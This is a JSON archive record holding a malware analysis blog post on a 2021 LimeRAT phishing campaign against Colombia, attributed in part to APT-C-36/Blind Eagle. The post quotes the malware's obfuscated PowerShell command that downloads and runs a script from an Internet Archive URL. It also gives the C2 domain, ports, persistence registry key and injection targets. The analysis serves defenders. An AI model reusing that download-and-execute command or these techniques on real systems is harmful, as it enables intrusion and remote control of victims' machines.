{
	"id": "496d68a4-3864-4a1b-a17a-b3861353347c",
	"created_at": "2026-04-06T00:16:12.40644Z",
	"updated_at": "2026-04-10T13:12:32.259457Z",
	"deleted_at": null,
	"sha1_hash": "68886576280e56f78d2df6457ef73c3650064c7b",
	"title": "Literature lover targeting Colombia with LimeRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 618593,
	"plain_text": "Literature lover targeting Colombia with LimeRAT\r\nPublished: 2021-05-17 · Archived: 2026-04-05 13:02:12 UTC\r\nIn the middle of the current brouhaha in Colombia, besides the intense hacktivism activity, some actors might be trying to make their move. Several campaigns aimed at Colombia have been detected, but today we will talk about one with a couple of interesting details in its kill chain.\r\nThis actor starts the infection via email with very generic topics such as subpoenas or bank payments, using a crafted HTML view where the icon pretending to be an attachment is in fact an image with a link to download a compressed file from OneDrive.\r\nPhishing emails serving the same malicious sample\r\nThe .rar file contains a Visual Basic Script with the same name, “citacion juzgado.vbs”, which, being poorly obfuscated, creates a Windows Script Host Shell object to download and execute a new PowerShell script by running the following command:\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” I`E`X((n`e`W`-Obj`E`c`T((‘Net.Webclient’))).((‘Downloadstri’+’ng’)).InVokE(((‘https://ia601509.us.archive.org/20/items/3_20210512_20210512_1430/3.txt’))))\r\nThe interesting fact about this first stage is that this element is downloaded from The Internet Archive, where you can take snapshots of websites or upload “antique” files so they remain accessible after the website disappears from the ordinary internet at its original hosting site. We are starting to witness how attackers use legitimate domains such as Discord or Twitter to download malicious payloads, or even legitimate cloud services such as OneDrive or Dropbox to host different samples. 
However, using The Internet Archive could be considered witty, and has not been seen much in the wild so far.\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 1 of 5\n\nOpendir in The Internet Archive\r\nBasically, this PowerShell script downloads a series of other scripts, which are dropped in “C:\\Users\\Public\\” and “C:\\ProgramData\\Microsoft Arts\\Start\\”, and establishes persistence using the registry key “HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders”.\r\nInfection Chain\r\nAmong these different scripts, most of them trying to disable typical antivirus solutions, there is one implementing a technique a little more advanced than the rest, known as Reflection Assembly, which consists of creating binary payloads as byte arrays in PowerShell and then loading them using puppet process injection into the memory of the process “C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe”, as shown in the following screenshot, or of “C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe”, depending on the results of some previous checks.\r\nReflected Assembly Process injection\r\nAfter dumping this binary content into the respective files, we could identify two dynamic libraries written in .NET, one of them used as a loader for the other, which happens to be the final malicious Remote Access Trojan (RAT).\r\nAccording to 360 Total Security researchers, similar techniques were spotted loading a Delphi version of njRAT in July 2020, by what seemed to be an Arabic-speaking actor. Even though in both cases the binary files turned out to be dynamic libraries loaded with the same technique, on this occasion both binaries were identified as written in .NET. 
Furthermore, the RAT used in this scenario was LimeRAT, a modified version of njRAT.\r\nWhen taking a closer look at the final stage in order to identify the final Command and Control server, we found another interesting element. This actor chose the domain “santiagonasar.]duckdns.org”, which is actually the name of the main character of Chronicle of a Death Foretold (Crónica de una muerte anunciada), a great novel written by the Colombian writer Gabriel García Márquez. But the passion for literature of our friends was not only reflected in the domain name, but also in the chosen port: 1984. Although the aforementioned book was published in 1983, our first impression was to think of this number as a reference to the novel written by George Orwell, named “1984”.\r\nDespite having seen the string “ALOSH” repeatedly through the different stages, suggesting that this could be an individual going by this nickname, it is worth mentioning that the APT group referred to as APT-C-36, or Blind Eagle, has been spotted many times using this same toolset, including LimeRAT, targeting the same geographic area through phishing emails written in perfect Spanish, and also using DuckDNS as part of its infrastructure.\r\nAfter quick research on previous DNS resolutions of the final C2, we could identify related documents contacting the same IP, referring to Colombia and using the word “Cacha”, which could be a way of saying “friend” or “brother” in Colombia, among other meanings in Spanish. These relations, added to the Spanish literary culture, would clearly indicate a focus on Colombia.\r\nPrevious domains resolving to the same IP\r\nDifferent execution parents\r\nLastly, after another quick search on different binary executables contacting this same C2, we found different forms of packed malware samples using strings in Asian and Cyrillic encodings, with noisier obfuscation. 
About these samples, we noticed that the attacker could have been only rotating the contacted port (4433, 1986, 2000), which could be enough to mislead an automated sandbox into identifying the host as dead. The cached analysis in shodan.io would also show that the server might only have one port open at a time, which would support the idea of the attacker rotating ports for every campaign while reusing the same C2 infrastructure.\r\nC2 check in shodan.io\r\nIOCs\r\nReferences\r\nhttps://twitter.com/1ZRR4H/status/1392789216141004802\r\nhttps://blog.360totalsecurity.com/en/new-infection-chain-of-njrat-variant/\r\nSource: https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/"
	],
	"report_names": [
		"literature-lover-targeting-colombia-with-limerat"
	],
	"threat_actors": [
		{
			"id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813",
			"created_at": "2022-10-25T15:50:23.688973Z",
			"updated_at": "2026-04-10T02:00:05.390055Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"APT-C-36",
				"Blind Eagle"
			],
			"source_name": "MITRE:APT-C-36",
			"tools": [
				"Imminent Monitor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "be597b07-0cde-47bc-80c3-790a8df34af4",
			"created_at": "2022-10-25T16:07:23.407484Z",
			"updated_at": "2026-04-10T02:00:04.58656Z",
			"deleted_at": null,
			"main_name": "Blind Eagle",
			"aliases": [
				"APT-C-36",
				"APT-Q-98",
				"AguilaCiega",
				"G0099"
			],
			"source_name": "ETDA:Blind Eagle",
			"tools": [
				"AsyncRAT",
				"BitRAT",
				"Bladabindi",
				"BlotchyQuasar",
				"Imminent Monitor",
				"Imminent Monitor RAT",
				"Jorik",
				"LimeRAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Socmer",
				"Warzone",
				"Warzone RAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bd43391b-b835-4cb3-839a-d830aa1a3410",
			"created_at": "2023-01-06T13:46:38.925525Z",
			"updated_at": "2026-04-10T02:00:03.147197Z",
			"deleted_at": null,
			"main_name": "APT-C-36",
			"aliases": [
				"Blind Eagle"
			],
			"source_name": "MISPGALAXY:APT-C-36",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434572,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.pdf",
		"text": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.txt",
		"img": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.jpg"
	}
}